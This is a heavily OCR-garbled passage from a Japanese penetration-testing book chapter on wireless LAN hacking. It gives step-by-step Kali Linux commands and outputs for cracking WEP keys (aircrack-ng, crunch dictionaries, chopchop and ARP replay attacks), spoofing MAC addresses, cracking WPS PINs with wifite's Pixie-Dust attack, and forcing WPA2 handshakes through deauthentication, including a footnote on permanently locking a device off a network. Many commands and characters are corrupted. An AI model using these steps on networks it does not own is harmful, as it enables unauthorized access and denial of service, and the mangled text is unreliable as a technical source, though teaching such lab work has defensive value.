61 : airodump-ng で 5000 と な っ た タイ ミン グ で すぐ に 、aircrack-ng が 走る わけ で は あり ませ ん 
の ケイ ミン ゲ デ ご ル キャ ブチ ャ ファ イル を 読み 込ん で いる た めで す 。 つ まり 、 


と メ た) 由 りき 2 ゅ 。 ま ーー ES に の 。 
定 の タイ ミン グ ご こと に arcrack-ng が 
- の 


と の タイ ミン グ で 5000 個 の 倍数 以上 に な っ て いれ ば 、 再 び 解 析 が 行わ れ ま す 
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16 進数 表示 と ASCII 表示 の WEP キ ー が 表示 され て いま す 。 ASCII 表示 の WEP 
キー は "1234567890123" と な っ て お り 、AP に 設定 し た も の と 一 致し ます 。 

以上 より 、128 ビ ッ ト 版 の WEP で も 十分 に パケ ッ ト が 揃え ば 解読 で きる こと が 
わか り ま し た 。 


@ WEP キー の 一 部 が 判明 し て いる と き の 解 析 


AP の 設定 は これ まで と 一 緒 と し ます 。 攻撃 者 は 何ら か の 方 法 で WEP キ ー の 一 
部 を 知っ て いる も の と し ます (62)。 こ こ で は 、 全 体 で 数 字 し か 使わ れ て お ら ず 、 
前 半 の 7 桁 (1234567') を 特定 済み と し ます 。 


1)airodump-ng を 実行 する 
前 述 の 攻撃 潜 の ステ ッ プ ③ ま で は 同様 と し 、airodump-ng で キャ プチ ャ ファ イ 
ル を 出力 し ます 。 


root@ka11:<## airodump-ng --channel] 1 --bssid 99:91:8E:B9:8D:98 
--wP1te crack1ng_wep wlan9 


ある 程度 IV が 揃え ば キャ プチ ャ を 止め て も 構い ませ ん 。 た だ し 、 解 析 に 失敗 し 
た と き に 再 キ ャ プチ ャ する の が 手間 な の で 、 わ ざわ ざ 止 め る 必要 は な いで し ょ う 。 


②) 辞 書 フ ァイル を 作成 する 

aircrackung は -w オ プシ ョ ン で ファ イル を 指定 で きま す 。 通常 は 辞書 ファ イル を 
指定 し ます 。 こ こ で は 、aircrack-ng の 解析 用 に 用 いる 辞書 ファ イル を 、crunch で 
作成 し ます 。 

crunch の 引数 に 何 を 指定 すれ ば よい の か を 考え ます 。128 ビ ッ ト 版 WEP の 
WEP キー は ASCII 文字 で 13 桁 な の で 、 最小 値 は 13、 最大 値 も 13 と し ます 。 ま た 、 
前 半 の 7 桁 (1234567) は 知っ て いる の で 、-t オ プシ ョ ン に 1234567%9%9696969%" 
を 指定 し ます 。 こ こ で は 残り の 不明 な 文字 が すべ て 数 字 と わか っ て いる の で 、 候 
科 の 文字 と し て "1234567890" を 指定 し ます 。 以 上 の 内 容 を 反映 させ る と 、 次 の コ 
マン ド に な り ま す 。 


*62 : 例え ば 、AP の SSID が WEP キ ー の 一 部 に 使わ れ て いた り 、 タ ー ゲ ッ ト ユ ー ザ ー が よく 使う 
文字 列 が わか っ て いた りす る 状況 が 当て は まり ます 。 
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まだ ファ イル に 出力 せ すず に 、 ま ず は 生成 され る 文字 列 を 確認 し て いま す 。 
| 1234567000000 一 1234567999999] が 生成 され て いる こと が わか り ま す 。 

次 の よう に ff オプション で 文字 セッ ト フ ァイル (crunch に は "/usr/share/ 
crunch/charset.lst が 用 意 さ れ て いる )、 そ の 後ろ に 適用 する パタ ー ン を 指定 し て 
も 同じ 動作 に な り ま す 。 





これ を ファ イル に 出力 する に は 、 リ ダイ レク ト を 用 いま す ("63)。 





単語 は 「13 桁 の 文字 + 改 行 ] な の で 、1 行 あたり 14 桁 、 す な わ ち 14 バ イト に な 
り ま す 。 単語 は 1.000.000 個 ある の で 、 総 バ イト 数 は 14.000.000 (= 単語 1.000.000 個 
x 14 バ イト ) と 計算 で き 、wc コ マン ド の 出力 結果 に 一 致し て いま す 。 


③ 辞 書 フ ァイル を 指定 し て 解析 する 
aircrack-ng で 辞書 ファ イル を 指定 し て 解析 する に は 、 次 の 書式 で 実行 し ます 。 


*63 : 出力 ファ イル を 指定 する て オプション が 用 意 き さき れ て いま す 。 し か し 、 出 力行 が 多い 場合 は 、 
o て オプ ショ ン で 指定 し た ファ イル が 生成 され ませ ん で し た 。 そ こ で 、 リ ダイ レク ト で 代用 し て い 
ます 。 
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た だ し 、-e オ プシ ョ ン で は AP の ESSID を 指定 し ます 


# aircrack-ng -w < 辞書 ファ イル > < ステ ッ プ ① で 生成 し た 。」 
キャ プチ ャ ファ イル > -e <ESSTD> 


Poot 合 Ka11:<# airCrack-ng -w wordlist.txtt cracking weD-92.CaD -e LAB1 


キャ プチ ャ ファ イル に 約 12000 個 の IV が あっ た 場合 、20 秒 程 度 で WEP キー の 


」 


明 析 に 成功 し まし た ( 図 6-79) (*64)。 た だ し 、IV が 1000 個 程 度 の 場合 で は 足 ! 


ュー 


ーー 


ず 、WEP キー の 解析 に 失敗 し まし た 。 Decrypted correctly が 87% に な っ て いま 


す が 、 
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KEY FUUND! 【[ 31:32:3 3 : 35 : 36 : 37 : 38 : 39 : 36 : 31 : 32 : 33 [ASC エ 1 : 1234567B90123 ) 
DecryDtemcj co 





$ だ 4 ・ 者 当 - リ キ タロ 公 た 引 / の げす ネ 。 と つ ニー ーー イア jj る 企 す カ お ーー デ キー ヒメ ー 3 レ 内 
64 : 画像 で は 約 66000 個 の IV を 和む キャ プチ ャ ファ イル が 使わ れ て いま す が 、 こ れ ほ ど 多 く の 


チリ も 3 ツ ーー ナ 。 ノブ 1 の) ア M 一 アー. 1 ーー 
IV は 必要 で な く 、 約 12000 個 で 十分 で し た 
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ファ イル 名 を 指定 する と ころ に " を 書く と 、 標 準 入力 を 受け 付け ます 。 パ イプ 
を 使え ば 、 crunch の 出力 (辞書 ファ イル の 内 容 ) を aircrack-ng の 辞書 ファ イル と 
し て 渡せ ます 。 


人 @ ラン タム MAC アド レス 機能 の 無効 化 


無線 LAN ク ライ アン ト に は 、 無線 LAN ア ダ プ ター の ラン ダム MAC ア ドレ ス 機 
能 が 備わっ て いる こと が あり ます 。 例え ば 、Windows 10 や iOS な ど に 搭載 され て 
いま す 。 こ の 機能 は 公衆 AP な ど に お いて 、MAC ア ドレ ス か ら 個 人 を トラ ッ キ ン 
グ さ れる こと を 防ぐ た め の も の で す C65)。 し か し 、 無 線 LAN ア ダ プ ター の MAC 
アド レス が 勝手 に 変更 され て し まう と 、 一 部 の 攻撃 で 不都合 で す C66)。Kali で は 
デフ ォ ル ト で ラン ダム ハー ドウ ェ ア 機 能 が 有効 に な っ て いま す 。//etc/ 
NetworkManager/NetworkManager.conf ファ イル に 、 次 の 内 容 を 追加 する こと 
で 、 無 効 に で きま す (67)。 





*65 : ラン ダム ハー ドウ ェ ア ア ドレ ス を 使う 理由 と 方 法 
https://support.microsott.com/ja-jp/help/4027925/windows-how-and-why-to-use-random- 
hardware-addresses 


*66 : 攻撃 以外 で も 不都合 が 起こ る こと が あり ます 。 ス イッ チン グ ハ プ は MAC ア ドレ ステ ー プ ブル 
を 持ち ます が 、 テ ー ブ ル に は 上 限 の サイ ズ が あり ます 。 つ まり 、 保 持 で きる MAC ア ドレ ス に 上 
限 が あり ます 。 上 限 値 を 超え て し まう と 、 通 信 が 途絶 えた MAC ア ドレ ス を 消去 す る まで 、 新 し 
い MAC ア ドレ ス を 学習 で き な く な り 、 ス イッ チン グ ハ プ の 挙動 が 不安 定 に な り ま す 。 家庭 内 の 
ネッ トワ ー ク で は 気 に す る 必要 は あり ませ ん が 、 親 模 が 大 きい ネッ トワ ー ク で は 注意 が 必要 で 
す 。 


*67 : MAC Address Spoofing in NetworkManager 1.4.0 - Thomas Haller's Blog 
https//blogs.gnome.org/thaller/2016/08/26/mac-address-spoofing-in-networkmanager-1-40/ 
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編集 後 は 、NetworkManager を 再起 動 し ます 。 


Poot 由 ka11:<# systemct] restart NetworkManager . SeTV1Ce 


@… KoreK chopchop attack 

WEP の 解析 に は 、 同 じ IV を 持つ 2 つの パケ ッ ト が 必要 で す 。 つ まり 、 キ ャ プ 
チャ し た パケ ッ ト が 多けれ ば 、IV が 重複 する 確率 は 大 きく な り ま す 。 よ っ て 、 こ 
ちら か ら の アク ショ ン で ター ゲッ ト の ネッ トワ ー ク の パケ ッ ト を 増やす こと が で 
きれ ば 、 解 析 時 間 の 短縮 が 期待 で きま す 。 

KoreK chopchop attack は 、NetSumblerorg の フォ ー ラ ム に 匿名 で 投稿 され た 
攻撃 で す ("68) ("69)。KoreK attack や chopchop attack と 略 さ れる こと も あり ま 
す 。 FMS 攻 撃 に も と づい て お り 、 鍵 を 高速 で 解析 で きま す 。 

KoreK chopchop attack を 体験 し て み ま し ょ う 。 準備 と し て 、 こ れ ま で の AP と 
同じ 設定 に し ます 。 そ し て 、 そ の 無線 LAN ネッ トワ ー ク に は 、Kali 以外 の 端末 は 
アク セス し て いな い 状 況 に し ます 。 


①) 無 線 LAN アダ プター の MAC アド レス を 変更 する 

無線 LAN ア ダ プ ター の ラン ダム MAC ア ドレ ス 機 能 を 無効 に し ます 。 さらに 、 
見 や すい よう に 無線 LAN ア ダ プ ター の MAC ア ドレ ス を 変更 し ます ("70)。 た だ 
し 、 ベ ペン ダーD は 同じ に し まし た 。 





Foot 個 ka11:< 革 macchanger -s wlan9 MAC ア ドレ ス を 確認 する 。 
Current MAC: 99 : c9: ca: 11: 22:33 (ALFA, TNC. ) 
Permanent MAC: 99:c9:ca:97:6b:82 (ALFA, TNC. ) 
root 同 ka11 : <# ユ 和 config wlan9 down MAC ア ドレ ス を 変更 する 。 
Poot 同 ka11:< macchanger --mac=99: c9: ca: 11 : 22 : 33 wlan9 





*68 : korek chopchop [Aircrack-ngl 
https//www.alrcrack-ng.org/doku.php?id=korek chopchop 


*9 : Attacks against the Wi protocols WEP and WPA 
https//matthieuio/d/wii-attacks-wep-wpa.pdf 
70 : MacChanger で MAC ア ドレ ス を 変更 で きま す (詳細 は 後述 )。 
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(② 無 線 LAN アダ プター を Monitor モー ド に する 
wlan0 を Monitor モ ー ド に し ます 。 


3)airodump-ng を 実行 する 
airodumpng で キャ プチ ャ デー タ を 出力 する まで は 、 これ まで と 同様 で す 。 こ の 
Terminal を 端末 A と 呼ぶ こと に し ます 。 





出力 を 見 る と 、ESSID は LAB1"、 AUTH は 空 に な っ て いま す 。 今回 の 実験 で は 
接続 端末 が な い 状態 な の で 、#Data が 増え て いま せん 。 この 端末 は 動作 させ た ま 
ま に し て お きま す 71)。 


④)aireplay-ng で 偽 の 認証 を する 


aireplay-ng で 、AP に 対し て 偽 の 認証 を し ます 。 引数 な し で 実行 し て 、 ヘ ルプ を 
参照 し ます 。 


71 : すでに 端末 が ネッ トワ ー ク に 参加 し て お り 、 極端 な パケ ッ ト の や り 取 り が な けれ ば #Data は 
あま り 増 えま せん 。 一 方 、 動 画 を 再生 し て いた り 、 無 株 LAN ネ ットワーク に 参加 する た め の 処 
理 が 実行 され て いた りす れ ば 、#Data が 増え ます 。 
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偽 の 認証 を する に は 、-fakeauth (-1) オプ ショ ン を 使え ば よい こと が わか り ま 
し た 。 そ こ で 、 次 の よう な 書式 で aireplay-ng を 実行 し ます 。 





別 Terminal を 起動 し て 、 次 の コマ ンド を 実行 し ます 。 こ の Terminal を 端末 B と 
呼ぶ こと に し ます 。 
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"Association successful' と 表示 され る と 、 端 末 A に お いて "AUTH" の 値 が 空欄 





か ら "OPN' (=OPEN) に 変わ り ま す 。 そ し て 、 ア クセ モス 端末 と し て Kali が 表示 さ 
れ 、 若 十 #Data が 増え た 状態 で す (放置 し て も 少し し か 増え な い )。 


5)ARP バケ ッ ト を 偽装 する (chopchop attack の 開始 ) 

ここ か ら が chopchop attack に な り ま す 。 通信 を キャ プチ ャ し て 、ARP パ ケッ ト 
を 待ち ます (キャ プチ ャ は ステ ッ プ ③ で 実行 済み )。 届 いた ら 、 そ れ を 偽造 し て 
ネッ トワ ー ク に 送信 し ます 。 

aireplay-ng で chopchop attack す る に は 、-chopchop (4) オプ ショ ン を 指定 し 
ます 。-b オ プシ ョ ン に は ター ゲッ ト AP の BSSID を 指定 し ます ("72)。 





ここ で は 、 次 の コマ ンド を 実行 し ます 。 





72: AP の BSSID の 指定 に て 、 -fakeauth の と き は -a オ プシ ョ ン 、 -chopchop の と き は -b オ プシ ョ 
ン で ある こと に 注意 し て くだ さい 。 aireplayng の ヘル プ に よる と 、-a オ プシ ョ ン は Replay オプ 
ショ ン 、-b オ プシ ョ ン は Filter オプ ショ ン と 説明 きれ て いま す 。 
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画 y が か n を 入力 。 





ここ で n を 入力 する と 、 別 の パケ ッ ト が 読み 込ま れ ま す 。 読み 込ま れる パケ ッ ト 
に よっ て 、 大 き さ が 異な り ま す 。 ダ ンプ デー タ が 35 行 に な る まで 繰り 返し 、 そ 
うな っ た ら y を 入力 し ます 。 

y を 入力 する と 、"Send x packets'" が 出 て OffsSet の カウ ント ダウ ン が 始ま り ま 
す 。 これら は 鍵 ス トリ ー ム の 生成 処理 で す 。 
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も し 、y を 押し た と き に 、"Failure: the access point does not properly discard 
frames with an inValid ICV - try running aireplay-ng in non-authenticated mode 
instead. と 表示 され た 場合 、 ス テッ プ ② を 実行 し 、 そ の 後 す ぐに ステ ッ プ ③ を 実 
行 し て くだ さい 。 

また 、 途 中 で "read failed: Network js down や "wi_read): Network js down" 
と 出 た 場合 も や 、 ス テッ プ ② か ら や り 志 し て くだ さい 。 ラ ンダ ム MAC ア ドレ ス を 見 
直し て くだ さい 。 

成功 すれ ば 、 最 終 的 に plaintext は cap フ ァイル に 出力 され 、keystream は xor 
ファ イル に 出力 され ます 。 


⑥ 偽 装 し た ARP パケ ッ ト を 送信 する 
packetforge-ng は 、 自 作 の パケ ッ ト を 送信 する ツー ル で す ("73)。-0 オ プシ ョ ン 
を 指定 し て 、 偽 装 し た ARP パ ケッ ト を 送り ます 。 





⑦)--interactive オプ ショ ン を 実行 する 
aireplay-ng に -interactive (-2) オプ ショ ン を 指定 し て 実行 する こと で 、#Data 
の 増加 が 期待 で きま す 。 


73 : Packetforge-ng [Aircrack-ng] 
https//www.aircrack-ng.org/doku.php?id=packetforge-ng 
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'Sent xxx packets が 増え 、 そ れ に と も な い #Data も 急激 に 増え 始め ます 
(74)。1 分 間 で #Data は 1 万 以上 増え る ぐら い の ス ピー ド で す 。 


(⑧ WEP キー を 解析 する 


別 Terminal を 起動 し て 、 aircrackng で 解析 し ます 。 後 は 解析 が 終了 する まで 待 
つの だ け ' ぜ で す 。 





74 : も し #Data の 増加 が 極端 に 居 け すれ ば 、 ど こ か の MAC ア ドレ ス の 指定 を 間違え て いる 可能 性 
が あり ます 。 
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解析 か ら 3 分 程度 、IV は 約 5 万 で 、WEP キ ー の 解析 に 成功 し まし た ( 図 6-80) 





図 6.80 WEP キ ー の 解析 に 成功 し た 


解析 に 了 し た ら 、 端 末 A と 端末 B で [Ctrll + 


[c] キー を 入力 し て 止め ます 
代 ARP 要求 リプ レイ 攻撃 


ARP 要 求 リ プレ イ 攻 撃 (ARP request replay attack) は 、ARP 有 要求 に 対す る リ 


プレ イ 攻 撃 で す 。 リ プレ イ 攻 撃 と は 、 デ ー タ を 故意 に 繰り 返し た り 、 遅 延 さ せ た 


6 
りす る 攻撃 で す 。 こ れ に より 、#Data を 増やせ ます 
1airodump-ng を 実行 する 

chopchop attack の ステ ッ プ ② ま で は 同様 で す 。 接 8 


婦 頭 辞 を arp-attack に し て 
airodump-ng を 実行 し ます 


root@Qka11i:<# airodump-ng --channe] 1 --bssid 99:91:8E:B9:8D:98 ._」 
--wP1 ユ te arD-at て tack wlan9 


2)aireplay-ng で 偽 の 認証 を する 


引 Terminal で 次 を 実行 し ます 。 
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root 人 Qka1i:<# aireplay-ng --fakeauth 9 -a 99:91:8E:B9:8D:98 -h .」 
99 : c9 : ca : 11 : 22 : 33 wlan9 
14:25:51 Maiting for beacon frame (BSSTD: 99:91:8E:B9:8D:98) -」 


on channel 1 


14:25:51 Sending _ Authentication Request (Open System ) [ACK ] 
14:25:51 Authenticat1on successfu1 

14:25:51 Sending Association Reqguest [ACK ] 

14:25:51 Association successful :-) (ATD: 1) 


AUTH 値 に |OPN」 が 表示 され ます が 、#Data は まだ あま り 増 えま せん (ここ 
まで は chopchop attack と 同様 )。 


3)-arpreplay オプ ショ ン を 実行 する (ARP 要求 リプ レイ 攻撃 の 開始 ) 
aireplay-ng に -arpreplay (-3) オプ ショ ン を 指定 し て 、ARP 要 求 リ プレ イ 攻 撃 
を 実現 し ます 。 


root@ka1i:<# aireplay-ng --arpreplay -b 99:91:8E:B9:8D:98 -h .」 
99 : C9:Ca: 11: 22 :33 wlan9 
14:27:12 Maiting for beacon frame (BSSID: 99:91:8E:B9:8D:98) on | 
channel] 1 
Saving ARP requests in replay_arp-9896 -142712 . cap 
You shoul1d also start airodump-ng to capture replies . 

("Read xxx packet (got yyy ARP and zzzz ACKs)" と 出 て 、xxx が 増え て いく ) 





"Read xxx packet (got yyy ARP and zzzz ACKs) と 出 て 、xxx の 値 が 増え ま 
す 。Terminal で の 処理 は その まま に し ます 。#Data の 増加 は か な り 速 いと いえ ま 
す 。10 分 韻 放 置 す る と 15 万 IV を 超え まし た ( 図 6-81)。 


4)WEP キー を 解析 する 
別 Terminal を 起動 し て 、 aircrackng で 解析 し ます 。 後 は 解析 が 終了 する まで 待 
の だ で ます 。 
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Poo 填 個 ka11 :- a1FCrack-ng arp-attack-91 . cap 


解析 が 完了 し た ら 、 各 Terminal で Ctrl] + [c] キー を 入力 し て 止め ます 








FCe%Dk = LUJJ 








ーー ー ママ ーーー TFT モイ T デ エ TUI 


Euctooth PAN 4.8/80GB 3.5GB 


235MB 2.16GB 





図 6-81 arpreplay と fakeauth で IV を 増大 させ た 


誠 WPA の 解析 


WPA と は 、 無線 LAN の 暗号 化 技術 の 1 つ で す 。WEP の 脆 騙 性 が 指摘 され 、 そ 
の 問題 を 改善 する た め に WPA は 開発 され まし た 。 その 後 、 AES を 扱え る よう に 避 
良さ れ た WPA2 が 開発 され まし た 。 現在 で は 、 多 く の 無 線 LAN ネ ットワーク で 


WPA2 が 採用 きれ て いま す 
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で WPS を 利用 し た 攻撃 


WPS (WiEi Protected Setunp) と は 、 簡 単に 端末 を 無線 LAN に 接続 させ る た め 
の 仕組 み で す 。 次 の 2 つの 方 式 が あり ます 。 


* WPS ボ タン を プッ シュ する 方 式 
・ PIN 認証 方 式 


前 者 は ボタ ン を 押す だ け で 、 簡 単に 接続 の 設定 が 完了 し ます 。 後者 は PIN を 入 
力 し て 接続 の 設定 が 完了 し ます 。 例え ば 、 ゲ ー ム 機 で も あれ ば キー 入力 する こと な 
く 、 ボ タン 一 発 で 無線 LAN に 接続 で き 、 と て も る 便利 と いえ ます 。 ま た 、 ネ ッ ト 
ワー ク 初 心 者 で あっ て も 、 比 較 的 簡単 に 無線 LAN に 接続 で きま す 。 

攻撃 者 の 目的 は 、 タ ー ゲ ッ ト AP の 無線 LAN ネ ットワーク に 参加 する こと で す 。 
WPA キー や WPS の PIN が 判明 すれ ば 、 こ の 目的 を 達成 で きま す 。WPA キー を 解 
析 す る より 、WPS の PIN を 解析 する 方 が 容易 と いえ る の で 、WPS の PIN の 解析 か 
ら 始 め る 方 が 効率 的 で し ょ う 。 

ルー ター は WPS 用 の ユニ ー ク な PIN (8 桁 の 数 字 列 ) を 持ち ます 。PIN は 8 桁 と 
短い うえ に 、 ル ー タ ー の 不備 (厳密 に は ある 特定 の チッ プ の 問題 ) に より 、 完 全 
な 乱数 で な いこ と が あり ます 。 疑似 乱数 生成 器 の 入力 値 は 乱数 で な けれ ば な り ま 
せん 。 そ れ に も か か わら ず 園 定 値 を 入力 する よう に 設計 され る ケー ス が あり ます 
(75)。 よ っ て 、 総 当たり 攻撃 する 候補 の PIN は 激減 し ます 。 

ルー ター の 種類 に も より ます が 、PIN を 10 回 連続 で 聞 違 えた り 、60 秒 以内 に 3 
度 PIN を 間 罰 えた だ りす る と ロッ ク さ れ ま す 。 一 度 ロ ッ ク さ れ て し まう と 、 正 し い 
PIN で も 受け 付け な く な り ま す 。 ロ ッ ク さ れ て し まっ た ら 、AP を 再起 動 す る し か 
あり ませ ん 。 そ こ で 、PIN を 総 当 た り 攻撃 する に は 、 ロ ッ ク さ れ な いよ うに 調整 し 
な が ら 認 証 を 試み な けれ ば な り ま せん 。reaver と いう WPS 用 の 攻撃 ツー ル 使 え 
ば ぱ ば 、 こ うし た 調整 を 細か く 設 定 で きま す 。 

し か し 、 そ の 設定 は 手間 が か か る の で 、 こ こ で は wijjte と いう ツー ル を 使い ま 
す 。 特別 な 設定 を する こと な く 、WPS の PIN の 解析 が 期待 で きま す 。 

さて 、WPS の PIN の 解析 法 に つい て 解説 し ます 。 実験 用 の AP を 用 意 し て 、 次 


75 : 暗号 技術 の 問題 で は な く 、 設 計 の 問題 で す 。 
https//japan.zdnetcom/artcle/35053139/ 
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の よう に 設定 し ます 。 


WPA-PSK (WPA2 で は な く WPA) 
"12345678" 


ルー ター の デフ ォ ル ト 値 





①)Monitor モー ド で ある こと を 確認 する 
無線 LAN ア ダ プ ター が Monitor モ ー ド で ある こと を 確認 し ます 。 





② ター ゲット AP を 探す 

Kaii に は WPS ス キャ ン ツ ー ル で ある Wash が イン スト ー ル され て いま す 。 ュ オ 
プシ ョ ン で イン ター フェ ー ス を 指定 する だ け で 、 周 囲 の AP の WPS の バー ジョ ン 
と ロッ ク 状 態 が わか り ま す 。 





ESSID が LAB2" の AP を 探し ます 。 見 つけ た ら 、[Ctrl] + [c] キー を 入力 し 
て スキ ャ ン を 止め ます 。 Lck の と ころ が No な の で 、 WPS 機 能 は ロッ ク さ れ て いま 
せん 。 つ まり 、WPS を 解析 で きま す 。 
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3③ WPS の PIN を 解析 する 
ター ゲッ ト AP が 見 つか っ た の で 、wiiite を 起動 し ます 。 自動 で AP スキ ャ ン が 
始ま り ま す 。 





何 度 も スキ ャ ン す る の で 、[Ctrl] + [c] キー を 入力 し て スキ ャ ン を 止め ます 。 
する と 、 タ ー ゲ ッ ト AP の 番号 を 入力 する よう に うな が され ます 。 こ こ で の ター 
ゲッ ト AP は 3 番 な の で 、「3」 を 入力 し ます 。 す る と 、 自動 的 に 解析 が 始ま り ま す 。 
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[+] select target(s) (1-23) separated by commas, dashes or al11: 3 





[+] (1/1) starting attacks against 88:57:EE:E4:B6:79 (LAB2 ) 

[+] LAB2 (87db) MPS Pixie-Dust: [4m57s] Cracked MPS PIN: 37244514 
[+] LAB2 (87db) MPS Pixie-Dust: [4m55s] Cracked MPS PSK: 12345678 
[+] ESSID: LAB2 

[+] BSSTD: 88:57:EE:E4:B6:79 

[+] Encryption: MPA (MPS ) 

[+] MPS PIN: 37244514 一 記 22n 喘 

[+] PSK/Password: 12345678 DE 王 天 

[+] saved crack result to cracked.txt (3 tota] ) 

[+] Finished attacking 1 target( s ) , exiting 


数 秒 で 解析 が 完了 し まし た 。 出 力 内 容 を 確認 する と 、WPS の PIN と WPA キー 
が 表示 され て いま す 。 


人 @ WPA の 解析 アプ ロー チ 

WEP を 解析 する アプ ロー チ は 、 大 量 の パケ ッ ト か ら 関 連 性 の ある も の を 探し 出 
し て 、 そ れ を 手がかり に し て 解析 し て いま し た 。 し か し 、WPA で は 、 各 パケ ッ ト 
が ユニ ー ク な 一 時 的 な 鍵 で 暗号 化 さ きれ て いま す 。 そ の た め 、 大 量 の パケ ッ ト を 収 
集 す る と いう アプ ロー チ で は 解析 が 困難 と いえ ます 。 そ こ で 、 ま っ た く 別 の アプ 
ロー チ で 攻撃 し ます 。 


人 @ WPA の 4-way handshake 

WPA-PSK と WPA2_PSK で は 、AP と 端末 導 の 接続 が 確立 する と き 、4-way 
handshake と いう や り 取 り が 行わ れ て いま す 。 この や り 取 り で 、 セ キュ リティ プロ 
トコ ル の 合意 、 ノ ンス (疑似 乱数 ) の 交換 、 鍵 の 生成 と 交換 を 行っ て いま す 。 処 
理 の 流れ は 、 図 682 を 見 て くだ さい 。 

WPA キー を PBKDF2 ア ル ゴ リ ズム ("76) に 入力 し て 、PSK (Pre Shared Key : 


76 : PKCS#5 PBKDEF2 で 規定 され て お り 、 一 種 の ハッ シュ 関数 の よう な も の で す 。 
https://www_.emc.com/collateral/white-papers/h11302-pkcs5y2-1-password-based- 
cryptography-standard-wp.pdf 
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事前 共有 鍵 ) を 得 ま す 。 次 に 、 あ る ハッ シュ 関数 を 通じ て 、PSK と ESSID か ら 
PMK (Pairwise Master Key : ペア マス ター 鍵 ) を 得 ま す 。 両 者 間 で 疑似 乱数 で あ 
る ノン ス (nonce) を や り 取 り し ます 。「 ノ ンス 、 両 者 の MAC ア ドレ ス 、PMK」 か 
ら PTK (Pairwise Transient Key : ペア ーー 時 鍵 ) を 得 ま す 。 最 後に 、GTK (Group 
Transient Key : グル ー プ ーー 時 鍵 ) も 配布 され 、 最 終 的 に 両者 間 で PTK と GTK が 
共有 され ます 。 

PTK は 端末 ご と に 信 う 値 で あり 、 そ の 端末 と AP 間 で の み 使 われ ます 。 一 方 、 
GTK は 、 プ ロー ドキ ャ スト や マル チキ ャ スト の た め の 早 号 通 信 の 鍵 で す 。GTK は 
複数 の 端末 で 共用 され る の で 、 安 全 性 が 低く な り ま す 。 そ の た め 、2-way 
handshake と いう 手続 き を 定期 的 に 行い 、GTK を 再生 成 し て 共有 し ます 。 た だ し 、 
GTK は 暗号 化 さ れ て や り 取 りさ れる の で 、 直 接 知 る こと は で きま せん 。 















PSK ESSID 







PSK ESSID 
j256 ピ ビット テー PMK ! PMK 
> ノン ス B を 生成 する 
ノン ス A を 生成 する 







ノン ス A 両者 の MAC 
PMK ノン ス B アド レス 


ハッ シュ 関数 


ノン ス A 両者 の MAC 
PMK ノン ス B アド レス 


PTK 






PTK、GTK PTK、GTK 


図 6.82 4-way handshake の 入出 力 と や り 取 り 
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@ WPA2 の 解析 


4-way handshake の 認証 デー タ を キャ プチ ャ で きれ ば 、WPA キー の 解析 に 活用 
で きそう で す 。 そ こ で 、 攻 撃 方 釘 と し て は 、 タ ー ゲ ッ ト 端 末 を 無線 LAN ネ ッ ト 
ワー ク か ら 切 断 さ せま す 。 す る と 、 タ ー ゲ ッ ト 適 末 は ネッ トワ ー ク に 再 接続 し よ 
うと し ます 。 そ の と き に 4-way handshake の 認証 デー タ を キャ プチ ャ し ます 。 

それ で は 、 WPA/WPA2 を 解析 し て み ま す 。 実験 用 の AP を 用 意 し て 、 次 の よう 
に 設定 し まし た 。 





そし て 、 少 な く と も 1 人 右 の 端末 (Kali 以 外 ) が ネッ トワ ー ク に 接続 し て いる も の 
とし まず す 。 


(①IMonitor モー ド で ある こと を 確認 する 
無線 LAN ア ダ プ ター が Monitor モ ー ド で ある こと を 確認 し ます 。 さ ら に 、MAC 
アド レス は 見 や すい よう に 0OrcOrca:11:22.33 と し まし た 。 
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2) タ ー ゲ ッ ト AP を 探す 


airodump-ng で ター ゲッ ト AP を 探し ます 。 


FOOt 仙 kal1 : > 昔 a1TodumD-ng wlan9 
CH 8 |][ Elapsed: 9 s || 2918-98-98 17:45 


BSSID PlMR Beacons #Data,#/s CH MB ENC 
CTPHER AUTH ESSTD 

( 略 ) 

99:91:8E:B9:8D:98 -42 3 1 9 6 65 MPA2 


CCMP PSK LAB3 で て 還 の ャ 所 くり パル も 過 


WPA2-PSK の AP が 見 つか り ま し た 。 こ れ を ター ゲッ ト に し ます 


3 ぅ ) キ ャ ブフ チャ ファ イル を 生成 する 
ター ゲッ ト AP を 指定 し て 、 キ ャ プチ ャ ファ イル を 生成 し ます ( 図 6-83)。 


root@Qka11i:<# airodump-ng --bssid 99:91:8E:B9:8D:98 --channe1 6 .」 


--wPrite handshake wlan9 


File EdIt Vew Seah Terminal Help 








ター ゲッ ト AP に 接続 済み の 端末 の 情報 が 表示 され ます 。 
BSSID が 接続 し た AP の MAC ア ドレ ス 、STATION が 端末 の /MAC ア ドレ ス に な り ま す 。 


図 6.83 ター ゲッ ト AP に 対し て パケ ッ ト キ ャ プチ ャ する 





下部 に 接続 端末 が 表示 され る の で 、 タ ー ゲ ッ ト 端 末 の MAC ア ドレ ス が 判明 し 
ます 。 
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④ 無 線 LAN ネッ トワ ー ク か ら タ ー ゲ ッ ト 上 端末 を 切断 する 

無線 LAN ネ ットワーク か ら タ ー ゲ ッ ト 端 末 を 切断 する 必要 が あり ます 。 こ こ で は 、 
Deauthentication ( 非 認証 ) アタ ッ ク を 採用 し ます 。 aireplay-ng で Deauthentication 
パケ ッ ト (DeAuth パ ケッ ト と 略す ) を 送信 する に は 、-deauth (-0) オプ ショ ン 
を 指定 し ます 。 

次 の コマ ンド を 入力 する と 、 タ ー ゲ ッ ト 端 末 に DeAuth パ ケッ ト が 送ら れ ま す 。 
この パケ ッ ト が 送ら れる と 、 認 証 が 解除 され 、 結 果 と し て ター ゲッ ト 端 末 は ネッ 
トワ ー ク か ら 切 断 さ れ ま す 。 





ター ゲッ ト 端 末 を 切断 させ る 程度 で あれ ば 、10 発 程度 の DeAuth パ ケッ ト で 十 
の や りす も すす が p 
こと で は 次 の よう に 天 力 し まし た 。 





する と 、airodump-ng の 出力 の 1 行 目 に て 、 右 側 に "WPA handshake" と いう 文 
字 列 が 表示 され ます ( 図 6-84) 。 


77 : 氷 続 的 に ター ゲッ ト 上 端末 を 無線 LAN ネ ットワーク か ら 締 め 出 す の で あれ ば 、 次 の よう に 大 





量 の DeAuth パ ケッ ト を 指定 し ます 。DeAuth バ ケッ ト が 止ま ら な い 限 り 、 タ ー ゲ ッ ト 上 端末 は 無 
株 LAN ネ ットワーク に 接続 で きま せん 。 








| 第 6 章 | LAN の ハッ キン グ 563 


alrodump-nEg で キャ プチ ャ し て いる 
EilliFll 





File EL View Seach Termiimal 








ニン ルン 4 に し さり と さり ウニ ニン 
か ら 切 断 さ れ 、 そ の 後に 再 接続 
され た の で 表示 され まし た 。 
alreplay-ng で DoS ア タッ ク を 

試み る Termlnal 


